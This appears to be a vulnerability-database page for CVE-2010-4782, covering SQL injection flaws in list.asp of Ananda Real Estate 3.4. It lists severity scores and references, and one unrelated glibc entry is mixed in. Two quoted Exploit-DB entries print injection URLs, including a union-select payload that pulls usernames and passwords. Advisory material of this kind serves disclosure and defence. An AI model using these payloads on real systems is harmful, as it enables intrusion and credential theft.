CVE-2010-4782
published 2011-04-07CVE-2010-4782: Multiple SQL injection vulnerabilities in list.asp in Softwebs Nepal (aka Ananda Raj Pandey) Ananda Real Estate 3.4 allow remote attackers to execute arbitrary…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.03%
59.4th percentile
Multiple SQL injection vulnerabilities in list.asp in Softwebs Nepal (aka Ananda Raj Pandey) Ananda Real Estate 3.4 allow remote attackers to execute arbitrary SQL commands via the (1) city, (2) state, (3) country, (4) minprice, (5) maxprice, (6) bed, and (7) bath parameters, different vectors than CVE-2006-6807.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softwebsnepal | ananda_real_estate | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q688-rpcm-xxxh: Multiple SQL injection vulnerabilities in list
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2010-4782 [HIGH] CWE-89 GHSA-q688-rpcm-xxxh: Multiple SQL injection vulnerabilities in list
Multiple SQL injection vulnerabilities in list.asp in Softwebs Nepal (aka Ananda Raj Pandey) Ananda Real Estate 3.4 allow remote attackers to execute arbitrary SQL commands via the (1) city, (2) state, (3) country, (4) minprice, (5) maxprice, (6) bed, and (7) bath parameters, different vectors than CVE-2006-6807.
Red Hat
glibc: fnmatch() alloca()-based memory corruption flaw
vendor_redhat·2010-08-05·CVSS 5.0
CVE-2011-1071 [MEDIUM] glibc: fnmatch() alloca()-based memory corruption flaw
glibc: fnmatch() alloca()-based memory corruption flaw
The GNU C Library (aka glibc or libc6) before 2.12.2 and Embedded GLIBC (EGLIBC) allow context-dependent attackers to execute arbitrary code or cause a denial of service (memory consumption) via a long UTF8 string that is used in an fnmatch call, aka a "stack extension attack," a related issue to CVE-2010-2898, CVE-2010-1917, and CVE-2007-4782, as originally reported for use of this library by Google Chrome.
No detection rules found.
Exploit-DB
Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections
exploitdb·2010-12-02
CVE-2010-4782 Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections
Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections
---
TITLE: Ananda Real Estate "list.asp" Multiple SQL Injection Vulnerabilities
PRODUCT: Ananda Real Estate 3.4
PRODUCT URL: http://www.softwebsnepal.com/website_design_realestate.htm
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
BUGS:
http://[host]/[path]/list.asp?city=%27%29%29+union+insect&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=%27%29%29+union+insect&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=%27%29%29+union+insect&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&sta
Exploit-DB
Ananda Real Estate 3.4 - 'agent' SQL Injection
exploitdb·2006-12-24
CVE-2010-4782 Ananda Real Estate 3.4 - 'agent' SQL Injection
Ananda Real Estate 3.4 - 'agent' SQL Injection
---
# Title : Ananda Real Estate <= 3.4 (agent) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.enthrallweb.us
# $$ : 179.40 USD
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//list.asp?agent=[SQL]
Example:
//list.asp?agent=-1%20union%20select%20username,0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user%20where%20id%20like%201
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-24]
No writeups or analysis indexed.
http://packetstormsecurity.org/files/view/96305/anandarealestate-sql.txthttp://secunia.com/advisories/23506http://securityreason.com/securityalert/8185http://www.exploit-db.com/exploits/15661http://www.securityfocus.com/bid/45146http://packetstormsecurity.org/files/view/96305/anandarealestate-sql.txthttp://secunia.com/advisories/23506http://securityreason.com/securityalert/8185http://www.exploit-db.com/exploits/15661http://www.securityfocus.com/bid/45146
2011-04-07
Published